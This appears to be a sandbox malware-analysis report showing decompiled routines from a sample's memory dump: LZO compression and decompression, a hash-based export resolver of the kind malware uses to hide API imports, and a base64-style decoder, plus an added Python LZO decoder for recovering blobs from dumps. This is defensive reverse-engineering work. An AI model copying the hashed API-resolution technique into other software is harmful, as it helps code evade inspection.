                          									E006F6610(_t338[1] + 1, 0, ((_t266 - 0x112) * 0x80808081 >> 0x20 >> 7) + 1);
                          									_t236 = _t338[4];
                          									_t338 =  &(_t338[3]);
                          									do {
                          										_t225 = _t225 + 0xffffff01;
                          										_t236 = _t236 + 1;
                          										__eflags = _t225 - 0xff;
                          									} while (_t225 > 0xff);
                          									_t266 = _t301;
                          								}
                          								 *(_t231 + 1) = _t225;
                          								_t224 = _t338[0xc];
                          								_t231 = _t231 + 2;
                          								__eflags = _t231;
                          							} else {
                          								 *_t231 = _t266 + 0xfd;
                          								_t231 = _t231 + 1;
                          							}
                          						} else {
                          							 *(_t231 - 2) =  *(_t231 - 2) | _t266;
                          						}
                          					} else {
                          						_t231 = _t306 + 1;
                          						 *_t306 = _t266 + 0x11;
                          					}
                          					_t226 = _t224 + _t319;
                          					_t320 = _t231;
                          					_t147 =  ~_t266;
                          					do {
                          						 *_t231 =  *((intOrPtr*)(_t226 + _t147));
                          						_t231 = _t231 + 1;
                          						_t147 = _t147 + 1;
                          					} while (_t147 != 0);
                          					_t144 = _t338[0xf];
                          					_t231 = _t320 + _t301;
                          				}
                          				 *_t231 = 0x11;
                          				 *(_t231 + 2) = 0;
                          				 *_t144 = _t231 + 3 - _t306;
                          				return 0;
                          			}

                          Instruction address column for this function (0x006f35e7 through 0x006f3ab4, one address per decompiled line); the column was detached from the code lines by extraction.

                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
                          • Instruction ID: 0e51e845a0b3721e604a526cbf4740086732b9495102e126bcc0f6538324a585
                          • Opcode Fuzzy Hash: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
                          • Instruction Fuzzy Hash: E1E1D17160C2998FC714DE28C48057AFBE3EF95300F18866DEAD58B346E375AE468B91
                          Uniqueness

                          Uniqueness Score: -1.00%
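
The routine whose body ends above emits codes using the constants of the LZO1X compressed format: literal-run thresholds 0x11 and 0x12, the M2 marker 0xe0 with an offset limit of 0x800, the M3 marker 0x20 with a limit of 0x4000, the M4 marker 0x10 with the offset's bit 14 folded into the marker (`>> 0xb & 8`), run-length extension bytes produced by a division by 255 compiled as a multiply by 0x80808081, and the end marker 0x11 0x00 0x00. E006E2E60 below starts the way the matching decoder does (first byte compared with 0x12, `ip[-2] & 3` as the trailing-literal count, the 0x801 offset bias on the three-byte match). That identification is an inference from the constants, not something the report states. The decoder below is an added example written for this page, not code from the sample and not part of the Joe Sandbox output; SAMPLE_STREAM is a hand-built stream, not data taken from the sample. It can be pointed at a blob carved from a memory dump to recover the plaintext, and it carries the input bounds checks a decoder fed untrusted data needs.

```python
# Pure-Python decoder for the LZO1X stream format. Added example; not the sample's
# code and not Joe Sandbox output. The constants mirror those visible in the
# decompiled routines on this page (0xe0 / 0x20 / 0x10 markers, 0x800 / 0x4000).

M2_MAX_OFFSET = 0x0800   # largest back-reference an M2 (two-byte) code can express
M3_MAX_OFFSET = 0x4000   # M3 limit; an M4 code adds this to its 14-bit offset


class LZOError(ValueError):
    """Truncated input, back-reference before the start of output, or empty stream."""


def lzo1x_decompress(src: bytes):
    """Decode one LZO1X stream. Returns (decompressed bytes, input bytes consumed)."""
    if not src:
        raise LZOError("empty input")
    out = bytearray()
    n = len(src)
    ip = 0

    def byte():
        # next input byte, with the bounds check a decoder fed untrusted blobs needs
        nonlocal ip
        if ip >= n:
            raise LZOError("truncated input at offset %d" % ip)
        ip += 1
        return src[ip - 1]

    def run_length(base):
        # zero-extended length: every 0x00 byte adds 255, the final byte adds base + value
        extra = 0
        while True:
            b = byte()
            if b:
                return extra + base + b
            extra += 255

    def literals(count):
        nonlocal ip
        if ip + count > n:
            raise LZOError("truncated literal run at offset %d" % ip)
        out.extend(src[ip:ip + count])
        ip += count

    def copy_match(dist, length):
        # byte-wise so an overlapping reference (dist < length) repeats the pattern
        start = len(out) - dist
        if start < 0:
            raise LZOError("back-reference before start of output at offset %d" % ip)
        for i in range(length):
            out.append(out[start + i])

    # A first byte above 17 is a short initial literal run of (byte - 17) bytes.
    state, t = "run", 0
    if src[0] > 17:
        ip = 1
        count = src[0] - 17
        literals(count)
        t = byte()
        state = "match" if count < 4 else "after_literals"

    while True:
        if state == "run":
            t = byte()
            if t >= 16:
                state = "match"
            else:
                if t == 0:
                    t = run_length(15)
                literals(t + 3)
                t = byte()
                state = "after_literals"
        if state == "after_literals":
            if t >= 16:
                state = "match"
            else:  # M1 code right after a literal run: 3-byte match, offset > 0x800
                copy_match(1 + M2_MAX_OFFSET + (t >> 2) + (byte() << 2), 3)
                state = "done"
        if state == "match":
            if t >= 64:      # M2: length 3..8, offset <= 0x800
                dist = 1 + ((t >> 2) & 7) + (byte() << 3)
                copy_match(dist, (t >> 5) + 1)
            elif t >= 32:    # M3: offset <= 0x4000, length in the low 5 bits
                length = (t & 31) or run_length(31)
                b0, b1 = byte(), byte()
                copy_match(1 + (b0 >> 2) + (b1 << 6), length + 2)
            elif t >= 16:    # M4: offset > 0x4000, or the end marker when the offset is 0
                length = (t & 7) or run_length(7)
                b0, b1 = byte(), byte()
                dist = ((t & 8) << 11) + (b0 >> 2) + (b1 << 6)
                if dist == 0:
                    return bytes(out), ip
                copy_match(dist + M3_MAX_OFFSET, length + 2)
            else:            # M1 after a match: 2-byte match
                copy_match(1 + (t >> 2) + (byte() << 2), 2)
            state = "done"
        if state == "done":
            # low two bits of the code byte two back count literals before the next match
            t = src[ip - 2] & 3
            if t == 0:
                state = "run"
            else:
                literals(t)
                t = byte()
                state = "match"


def try_decompress(src: bytes):
    """Return (data, consumed) or None; useful when scanning a dump for candidate blobs."""
    try:
        return lzo1x_decompress(src)
    except LZOError:
        return None


# Constructed by hand for this example (not from the sample): 4 literals, an 8-byte
# overlapping M2 match at distance 4 carrying 3 trailing literals, a 12-byte M3 match
# at distance 15, a 5-byte literal run, then the end marker 0x11 0x00 0x00.
SAMPLE_STREAM = bytes([0x15, 0x41, 0x42, 0x43, 0x44, 0xEF, 0x00, 0x58, 0x59, 0x5A,
                       0x2A, 0x38, 0x00, 0x02, 0x31, 0x32, 0x33, 0x34, 0x35,
                       0x11, 0x00, 0x00])

if __name__ == "__main__":
    data, used = lzo1x_decompress(SAMPLE_STREAM)
    print(used, data)
```

The consumed length is returned alongside the data so that a blob carved from a larger region, where bytes follow the end marker, can be accepted or rejected by the caller; `try_decompress` turns any malformed candidate into `None`, which is the behaviour wanted when sliding over a dump looking for the start of a stream.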

                          C-Code - Quality: 100%
                          			E006E2E60() {
                          				signed char _t81;
                          				intOrPtr* _t85;
                          				signed int _t91;
                          				signed int _t103;
                          				void* _t105;
                          				void* _t106;
                          				signed char _t107;
                          				signed char _t111;
                          				signed short* _t117;
                          				intOrPtr* _t121;
                          				signed int _t127;
                          				void* _t130;
                          				signed char _t131;
                          				void* _t133;
                          				signed int _t134;
                          				void* _t136;
                          				void* _t137;
                          				intOrPtr* _t138;
                          				signed int _t145;
                          				signed int _t146;
                          				void* _t151;
                          				signed int _t152;
                          				signed int _t154;
                          				signed int _t155;
                          				void* _t156;
                          				void* _t158;
                          				void* _t160;
                          				void* _t167;
                          				signed int _t168;
                          				void* _t170;
                          				signed int _t172;
                          				signed int _t173;
                          				signed int _t175;
                          				signed int _t178;
                          				void* _t182;
                          				void* _t184;
                          				void* _t185;
                          				void* _t186;
                          				void* _t187;
                          				signed int _t188;
                          				signed short* _t189;
                          				signed short* _t190;
                          				signed short* _t191;
                          				signed short* _t192;
                          				void* _t193;
                          				void* _t195;
                          				signed int _t198;
                          				signed short* _t201;
                          				signed int _t202;
                          				signed int _t203;
                          				signed short* _t204;
                          				void* _t209;
                          				signed int* _t211;
                          
                          				_t190 = _t211[8];
                          				_t134 = _t211[0xa];
                          				 *(_t211[0xb]) = 0;
                          				_t81 =  *_t190 & 0x000000ff;
                          				if(_t81 < 0x12) {
                          					_t204 = _t190;
                          					goto L8;
                          				} else {
                          					_t175 = _t81 - 0x11;
                          					_t204 =  &(_t190[0]);
                          					if(_t175 >= 4) {
                          						_t189 = _t190 + _t81 - 0x10;
                          						_t203 = _t211[0xa];
                          						_t133 = 0;
                          						do {
                          							 *((char*)(_t203 + _t133)) =  *((intOrPtr*)(_t204 + _t133));
                          							_t133 = _t133 + 1;
                          						} while (_t175 != _t133);
                          						_t172 = _t175 + _t203;
                          						_t201 = _t189;
                          						L27:
                          						_t146 =  *_t201 & 0x000000ff;
                          						if(_t146 <= 0xf) {
                          							_t192 =  &(_t201[1]);
                          							_t121 = _t172 - (_t146 >> 2) + 0xfffff7ff - ((_t201[0] & 0x000000ff) << 2);
                          							 *_t172 =  *_t121;
                          							 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t121 + 1));
                          							 *(_t172 + 2) =  *((intOrPtr*)(_t121 + 2));
                          							_t173 = _t172 + 3;
                          							L30:
                          							_t204 = _t192;
                          							L60:
                          							_t134 = _t173;
                          							_t175 =  *(_t204 - 2) & 3;
                          							if(_t175 == 0) {
                          								_t81 =  *_t204;
                          								L8:
                          								_t191 =  &(_t204[0]);
                          								_t146 = _t81 & 0x000000ff;
                          								if(_t81 > 0xf) {
                          									goto L31;
                          								} else {
                          									if(_t146 == 0) {
                          										_t131 =  *_t191;
                          										if(_t131 == 0) {
                          											_t170 = 0;
                          											do {
                          												_t131 = _t204[1];
                          												_t170 = _t170 + 0xff;
                          												_t204 =  &(_t204[0]);
                          											} while (_t131 == 0);
                          										}
                          										_t146 = 0 + (_t131 & 0x000000ff) + 0xf;
                          										_t191 =  &(_t204[1]);
                          									}
                          									_t172 = _t134 + 4;
                          									_t209 = _t146 - 1;
                          									 *_t134 =  *_t191;
                          									_t117 = _t191;
                          									_t201 =  &(_t191[2]);
                          									if(_t209 != 0) {
                          										 *_t211 = _t117;
                          										if(_t209 <= 3) {
                          											_t186 = 0;
                          											_t167 = _t146 + 3;
                          											 *_t211 =  *_t211 + _t146 + 3;
                          											do {
                          												 *((char*)(_t172 + _t186)) =  *((intOrPtr*)(_t201 + _t186));
                          												_t186 = _t186 + 1;
                          											} while (_t209 != _t186);
                          											_t201 =  *_t211;
                          											goto L25;
                          										} else {
                          											_t168 = _t146 + 0xfffffffb;
                          											_t187 = 4;
                          											_t127 = _t168 & 0xfffffffc;
                          											_t202 = _t127;
                          											_t211[2] = _t127 + 8;
                          											_t178 =  *_t211;
                          											_t211[1] = _t178 + _t127 + 8;
                          											do {
                          												_t209 = _t209 + 0xfffffffc;
                          												 *((intOrPtr*)(_t134 + _t187)) =  *((intOrPtr*)(_t178 + _t187));
                          												_t187 = _t187 + 4;
                          											} while (_t209 > 3);
                          											_t134 = _t134 + _t211[2];
                          											_t167 = _t168 - _t202;
                          											if(_t167 != 0) {
                          												_t188 = _t211[1];
                          												_t130 = 0;
                          												_t201 = _t188 + _t167;
                          												do {
                          													 *((char*)(_t134 + _t130)) =  *((intOrPtr*)(_t188 + _t130));
                          													_t130 = _t130 + 1;
                          												} while (_t167 != _t130);
                          												L25:
                          												_t145 = _t134 + _t167;
                          											} else {
                          												_t201 = _t211[1];
                          											}
                          										}
                          										_t172 = _t145;
                          									}
                          									goto L27;
                          								}
                          								goto L32;
                          							} else {
                          								goto L61;
                          							}
                          							L66:
                          						} else {
                          							_t191 =  &(_t201[0]);
                          						}
                          					} else {
                          						_t134 = _t211[0xa];
                          						L61:
                          						_t193 = _t175 - 1;
                          						_t151 = 0;
                          						do {
                          							 *((char*)(_t134 + _t151)) =  *((intOrPtr*)(_t204 + _t151));
                          							_t151 = _t151 + 1;
                          						} while (_t175 != _t151);
                          						_t146 =  *(_t204 + _t175) & 0x000000ff;
                          						_t134 = _t134 + _t175;
                          						_t191 = _t204 + _t193 + 2;
                          						L31:
                          						_t172 = _t134;
                          					}
                          				}
                          				L32:
                          				if(_t146 >= 0x40) {
                          					_t152 = (_t146 >> 5) - 1;
                          					_t204 =  &(_t191[0]);
                          					_t138 = _t172 - (_t146 >> 0x00000002 & 0x00000007) - 1 - (( *_t191 & 0x000000ff) << 3);
                          					L57:
                          					_t60 = _t152 + 2; // 0x2
                          					_t182 = _t60;
                          					_t195 = 0;
                          					 *_t172 =  *_t138;
                          					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t138 + 1));
                          					do {
                          						 *((char*)(_t172 + _t195 + 2)) =  *((intOrPtr*)(_t138 + _t195 + 2));
                          						_t195 = _t195 + 1;
                          					} while (_t152 != _t195);
                          					_t173 = _t172 + _t182;
                          					goto L60;
                          				}
                          				if(_t146 >= 0x20) {
                          					_t152 = _t146 & 0x0000001f;
                          					if(_t152 == 0) {
                          						_t111 =  *_t191;
                          						if(_t111 == 0) {
                          							_t160 = 0;
                          							do {
                          								_t111 = _t191[0];
                          								_t160 = _t160 + 0xff;
                          								_t191 =  &(_t191[0]);
                          							} while (_t111 == 0);
                          						}
                          						_t191 =  &(_t191[0]);
                          						_t152 = 0 + (_t111 & 0x000000ff) + 0x1f;
                          					}
                          					_t204 =  &(_t191[1]);
                          					_t138 = _t172 - (( *_t191 & 0x0000ffff) >> 2) - 1;
                          					L49:
                          					if(_t152 < 6 || _t172 - _t138 < 4) {
                          						goto L57;
                          					} else {
                          						_t185 = _t152 - 2;
                          						_t155 = _t152 + 0xfffffffa;
                          						 *_t172 =  *_t138;
                          						_t103 = _t155 & 0xfffffffc;
                          						 *_t211 = _t103;
                          						_t211[1] = _t138 + _t103 + 8;
                          						_t105 = 4;
                          						_t211[2] = _t103 + 8;
                          						do {
                          							_t185 = _t185 + 0xfffffffc;
                          							 *((intOrPtr*)(_t172 + _t105)) =  *((intOrPtr*)(_t138 + _t105));
                          							_t105 = _t105 + 4;
                          						} while (_t185 > 3);
                          						_t173 = _t172 + _t211[2];
                          						_t156 = _t155 -  *_t211;
                          						if(_t156 != 0) {
                          							_t198 = _t211[1];
                          							_t106 = 0;
                          							do {
                          								 *((char*)(_t173 + _t106)) =  *((intOrPtr*)(_t198 + _t106));
                          								_t106 = _t106 + 1;
                          							} while (_t156 != _t106);
                          							_t173 = _t173 + _t156;
                          						}
                          					}
                          					goto L60;
                          				}
                          				if(_t146 < 0x10) {
                          					_t192 =  &(_t191[0]);
                          					_t85 = _t172 - (_t146 >> 2) - 1 - (( *_t191 & 0x000000ff) << 2);
                          					 *_t172 =  *_t85;
                          					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t85 + 1));
                          					_t173 = _t172 + 2;
                          					goto L30;
                          				}
                          				_t136 = _t172 - ((_t146 & 0x00000008) << 0xb);
                          				_t152 = _t146 & 0x00000007;
                          				if(_t152 == 0) {
                          					_t107 =  *_t191;
                          					if(_t107 == 0) {
                          						_t158 = 0;
                          						do {
                          							_t107 = _t191[0];
                          							_t158 = _t158 + 0xff;
                          							_t191 =  &(_t191[0]);
                          						} while (_t107 == 0);
                          					}
                          					_t191 =  &(_t191[0]);
                          					_t152 = 0 + (_t107 & 0x000000ff) + 7;
                          				}
                          				_t91 = _t211[8];
                          				_t184 = _t211[9] + _t91;
                          				_t137 = _t136 - (( *_t191 & 0x0000ffff) >> 2);
                          				_t204 =  &(_t191[1]);
                          				if(_t137 != _t172) {
                          					_t138 = _t137 + 0xffffc000;
                          					goto L49;
                          				}
                          				_t154 = (_t91 & 0xffffff00 | _t204 - _t184 >= 0x00000000) << 0x00000002 & 0x000000ff | 0xfffffff8;
                          				_t95 =  !=  ? _t154 : 0;
                          				 *(_t211[0xb]) = _t172 - _t211[0xa];
                          				return  !=  ? _t154 : 0;
                          				goto L66;
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
                          • Instruction ID: 4ffdd233cd60cc9cc51ffb2717cf17c191ab0e4ac8f52f4aa911621cdc82fb92
                          • Opcode Fuzzy Hash: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
                          • Instruction Fuzzy Hash: 80A14B311093E24BCB298F3DC8A41B9FBE3AF5A314B1D46ADD9D6CB347D2249906C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E006E36E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                          				char _v528;
                          				char _v638;
                          				char _v789;
                          				char _v1148;
                          				char _v1149;
                          				char _v1150;
                          				intOrPtr _t51;
                          				void* _t55;
                          				char* _t56;
                          				void* _t57;
                          				intOrPtr* _t58;
                          				unsigned int _t59;
                          				void* _t63;
                          				signed int _t65;
                          				void* _t68;
                          				void* _t69;
                          				char _t74;
                          				intOrPtr _t79;
                          				signed int _t80;
                          				char _t81;
                          				char* _t82;
                          				char _t83;
                          				char* _t87;
                          				char* _t91;
                          				void* _t94;
                          				short _t95;
                          				void* _t97;
                          				signed char _t99;
                          				intOrPtr* _t101;
                          				char _t102;
                          				unsigned int _t103;
                          				intOrPtr* _t107;
                          				signed int _t110;
                          				signed int _t113;
                          				intOrPtr* _t116;
                          				intOrPtr _t117;
                          				signed int _t119;
                          				void* _t120;
                          				char _t121;
                          				void* _t123;
                          				intOrPtr _t124;
                          				char* _t125;
                          				void* _t129;
                          				intOrPtr* _t130;
                          				char _t143;
                          				char _t159;
                          
                          				_t51 = _a4;
                          				_t79 = _a8;
                          				_t101 = _a12;
                          				_t124 =  *((intOrPtr*)(_t51 + 0x3c));
                          				_t117 =  *((intOrPtr*)(_t51 + _t124 + 0x78));
                          				if(_t117 > _t79 || _t117 +  *((intOrPtr*)(_t51 + _t124 + 0x7c)) <= _t79) {
                          					 *_t101 = _t51 + _t79;
                          					goto L40;
                          				} else {
                          					_t55 = _t51 + _t79;
                          					_t80 = 0;
                          					do {
                          						_t102 =  *((intOrPtr*)(_t55 + _t80));
                          						 *((char*)(_t129 + _t80 + 0x16f)) = _t102;
                          						_t80 = _t80 + 1;
                          					} while (_t102 != 0);
                          					_t125 =  &_v789;
                          					do {
                          						_t56 = _t125;
                          						_t125 = _t125 + 1;
                          					} while ( *_t56 != 0x2e);
                          					 *_t56 = 0;
                          					_t57 = 0;
                          					do {
                          						_t81 =  *((intOrPtr*)(_t129 + _t57 + 0x16f));
                          						 *((char*)(_t129 + _t57 + 6)) = _t81;
                          						_t57 = _t57 + 1;
                          					} while (_t81 != 0);
                          					_t58 =  &_v1150;
                          					_t82 =  &_v638;
                          					while( *_t58 != 0) {
                          						_t58 = _t58 + 1;
                          						if(_t58 < _t82) {
                          							continue;
                          						}
                          						break;
                          					}
                          					 *_t58 = 0x6c6c642e;
                          					 *((intOrPtr*)(_t58 + 4)) = 0;
                          					_t83 = _v1150;
                          					if(_t83 == 0) {
                          						L25:
                          						_t59 = 0;
                          						L26:
                          						_t63 = E006E35D0(((_t59 >> 0x0000000b ^ _t59) << 0xf) + (_t59 >> 0x0000000b ^ _t59));
                          						_t130 = _t129 + 4;
                          						if(_t63 != 0) {
                          							L31:
                          							_t119 =  *_t125;
                          							_t87 =  &_v1148;
                          							_t103 = 0;
                          							 *((short*)(_t87 - 2)) = 1;
                          							 *_t130 = _t87;
                          							if(_t119 == 0) {
                          								L39:
                          								_t91 =  &_v1150;
                          								 *((intOrPtr*)(_t91 + 2)) = ((_t103 >> 0x0000000b ^ _t103) << 0xf) + (_t103 >> 0x0000000b ^ _t103);
                          								_t107 = _t130;
                          								 *((short*)(_t91 + 6)) = 0;
                          								 *((intOrPtr*)(_t91 + 8)) = 0;
                          								 *_t107 = _t91;
                          								_push( &_a12);
                          								_push(_t107);
                          								_push(_t63);
                          								E006E5F90();
                          								L40:
                          								return 1;
                          							}
                          							_t94 = 0xffffffffffffffff;
                          							do {
                          								_t159 =  *((char*)(_t125 + _t94 + 2));
                          								_t94 = _t94 + 1;
                          							} while (_t159 != 0);
                          							if(_t94 + 1 <= 0) {
                          								goto L39;
                          							}
                          							_t110 = (_t119 << 0x0000000a) + _t119 >> 0x00000006 ^ (_t119 << 0x0000000a) + _t119;
                          							if(_t94 == 0) {
                          								L38:
                          								_t103 = _t110 + _t110 * 8;
                          								goto L39;
                          							}
                          							_t120 = 0;
                          							do {
                          								_t74 =  *((char*)(_t125 + _t120 + 1));
                          								_t120 = _t120 + 1;
                          								_t110 = (_t74 + _t110 << 0x0000000a) + _t74 + _t110 >> 0x00000006 ^ (_t74 + _t110 << 0x0000000a) + _t74 + _t110;
                          							} while (_t94 != _t120);
                          							goto L38;
                          						}
                          						_t65 = 0;
                          						while(1) {
                          							_t95 =  *((char*)(_t130 + _t65 + 6));
                          							 *((short*)(_t130 + 0x274 + _t65 * 2)) = _t95;
                          							if(_t95 == 0) {
                          								break;
                          							}
                          							_t65 = _t65 + 1;
                          							if(_t65 < 0x200) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t63 = E006EC6D0( &_v528);
                          						_t130 = _t130 + 4;
                          						if(_t63 == 0) {
                          							return 0;
                          						}
                          						goto L31;
                          					}
                          					_t68 = 0;
                          					do {
                          						_t143 =  *((char*)(_t129 + _t68 + 7));
                          						_t68 = _t68 + 1;
                          					} while (_t143 != 0);
                          					if(_t68 <= 0) {
                          						goto L25;
                          					}
                          					if(_t83 == 0) {
                          						L21:
                          						_t69 = _t68 - 1;
                          						_t113 = 0;
                          						_t97 = 0xffffffffffffffff;
                          						do {
                          							_t121 =  *((char*)(_t129 + _t97 + 7));
                          							_t97 = _t97 + 1;
                          							_t113 = (_t121 + _t113 << 0x0000000a) + _t121 + _t113 >> 0x00000006 ^ (_t121 + _t113 << 0x0000000a) + _t121 + _t113;
                          						} while (_t69 != _t97);
                          						_t59 = _t113 + _t113 * 8;
                          						goto L26;
                          					}
                          					_t116 =  &_v1149;
                          					_t123 = _t68;
                          					while(1) {
                          						_t99 = _t83 + 0xbf;
                          						if(_t99 <= 0x19) {
                          							 *(_t116 - 1) = _t99 | 0x00000020;
                          						}
                          						if(_t123 < 2) {
                          							goto L21;
                          						}
                          						_t83 =  *_t116;
                          						_t123 = _t123 - 1;
                          						_t116 = _t116 + 1;
                          						if(_t83 != 0) {
                          							continue;
                          						}
                          						goto L21;
                          					}
                          					goto L21;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
                          • Instruction ID: 39c1ca47c0106280ffa392a1763035c17a88d0cc84d69100df6aa39ce1aa4f97
                          • Opcode Fuzzy Hash: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
                          • Instruction Fuzzy Hash: B35136B16097D14BE718DA2698997A7F7E79F81304F18857CD48ACB352EA32CA06C345
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006E8230() {
                          				char _t54;
                          				intOrPtr _t58;
                          				signed char _t66;
                          				void* _t67;
                          				intOrPtr _t71;
                          				signed char _t80;
                          				void* _t81;
                          				intOrPtr* _t82;
                          				signed char* _t86;
                          				intOrPtr _t87;
                          				void* _t88;
                          				void* _t91;
                          				intOrPtr _t94;
                          				signed char _t95;
                          				intOrPtr* _t98;
                          				char _t99;
                          				signed char _t103;
                          				char _t104;
                          				char _t109;
                          				signed char* _t110;
                          				void* _t112;
                          				void* _t113;
                          				void* _t114;
                          				void* _t115;
                          				char _t118;
                          
                          				_t98 =  *((intOrPtr*)(_t115 + 0x20));
                          				_t86 =  *(_t115 + 0x24);
                          				_t54 =  *_t98;
                          				_t110 = _t86;
                          				if(_t54 != 0) {
                          					_t82 =  *((intOrPtr*)(_t115 + 0x28));
                          					_t109 = 0;
                          					do {
                          						_t118 =  *((char*)(_t98 + _t109 + 1));
                          						_t109 = _t109 + 1;
                          					} while (_t118 != 0);
                          					_t110 = _t86;
                          					_t87 = 0;
                          					_t112 = 0;
                          					while(1) {
                          						 *((char*)(_t115 + _t112 + 1)) = _t54;
                          						_t112 = _t112 + 1;
                          						_t109 = _t109 - 1;
                          						if(_t112 != 4) {
                          							goto L17;
                          						}
                          						 *((intOrPtr*)(_t115 + 8)) = _t87;
                          						_t94 =  *_t82;
                          						_t114 = 0;
                          						do {
                          							if(_t94 != 0) {
                          								_t99 = 0;
                          								_t71 = _t94;
                          								while(_t71 != _t71) {
                          									_t71 =  *((intOrPtr*)(_t82 + _t99 + 1));
                          									_t99 = _t99 + 1;
                          									if(_t71 != 0) {
                          										continue;
                          									} else {
                          									}
                          									goto L13;
                          								}
                          								 *((char*)(_t115 + _t114 + 1)) = _t99;
                          							}
                          							L13:
                          							_t114 = _t114 + 1;
                          						} while (_t114 != 4);
                          						_t95 =  *(_t115 + 2);
                          						_t103 = _t95 >> 0x00000004 & 0x00000003 |  *(_t115 + 1) << 0x00000002;
                          						 *(_t115 + 5) = _t103;
                          						_t80 = ( *(_t115 + 3) << 0x00000006) +  *((intOrPtr*)(_t115 + 4)) >> 0x00000002 & 0x0000000f | _t95 << 0x00000004;
                          						 *(_t115 + 6) = _t80;
                          						 *(_t115 + 7) = _t80;
                          						_t81 = 0xfffffffe;
                          						 *_t110 = _t103;
                          						do {
                          							_t110[_t81 + 3] =  *((intOrPtr*)(_t115 + _t81 + 8));
                          							_t81 = _t81 + 1;
                          						} while (_t81 != 0);
                          						_t98 =  *((intOrPtr*)(_t115 + 0x20));
                          						_t87 =  *((intOrPtr*)(_t115 + 8));
                          						_t110 =  &(_t110[3]);
                          						_t112 = 0;
                          						L17:
                          						if(_t109 != 0) {
                          							_t87 = _t87 + 1;
                          							_t54 =  *((intOrPtr*)(_t98 + _t87));
                          							continue;
                          						}
                          						if(_t112 != 0) {
                          							if(_t112 <= 3) {
                          								E006F6610(_t115 + _t112 + 1, 0, 4 - _t112);
                          								_t115 = _t115 + 0xc;
                          							}
                          							_t88 = 0;
                          							 *((char*)(_t115 + 8)) =  *_t82;
                          							do {
                          								if( *((char*)(_t115 + 8)) != 0) {
                          									_t58 =  *((intOrPtr*)(_t115 + 8));
                          									_t104 = 0;
                          									while(_t58 != _t58) {
                          										_t58 =  *((intOrPtr*)(_t82 + _t104 + 1));
                          										_t104 = _t104 + 1;
                          										if(_t58 != 0) {
                          											continue;
                          										} else {
                          										}
                          										goto L28;
                          									}
                          									 *((char*)(_t115 + _t88 + 1)) = _t104;
                          								}
                          								L28:
                          								_t88 = _t88 + 1;
                          							} while (_t88 != 4);
                          							_t66 =  *(_t115 + 2) >> 0x00000002 >> 0x00000004 & 3 |  *(_t115 + 2) << 0x00000004 |  *(_t115 + 1) << 0x00000002;
                          							 *(_t115 + 5) = _t66;
                          							 *(_t115 + 6) = _t66;
                          							 *(_t115 + 7) = ( *(_t115 + 3) << 6) +  *((intOrPtr*)(_t115 + 4));
                          							if(_t112 >= 2) {
                          								_t48 = _t112 - 1; // -1
                          								_t91 = _t48;
                          								 *_t110 = _t66;
                          								if(_t91 != 1) {
                          									_t113 = _t112 + 0xfffffffe;
                          									_t67 = 0;
                          									do {
                          										_t110[_t67 + 1] =  *((intOrPtr*)(_t115 + _t67 + 6));
                          										_t67 = _t67 + 1;
                          									} while (_t113 != _t67);
                          								}
                          								_t110 =  &(_t110[_t91]);
                          							}
                          						}
                          						_t86 =  *(_t115 + 0x24);
                          						goto L35;
                          					}
                          				}
                          				L35:
                          				 *_t110 = 0;
                          				return _t110 - _t86;
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
                          • Instruction ID: 3994e9e463bfaaaeb5dbc8afd91b7b2f6e60cf17c575e8aa9feb06b6467ea2b0
                          • Opcode Fuzzy Hash: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
                          • Instruction Fuzzy Hash: 0F51232944D7C15EE3268AA994543EBBFD38BE6304F0CCAACD5DC07743D826880BD792
                          Uniqueness
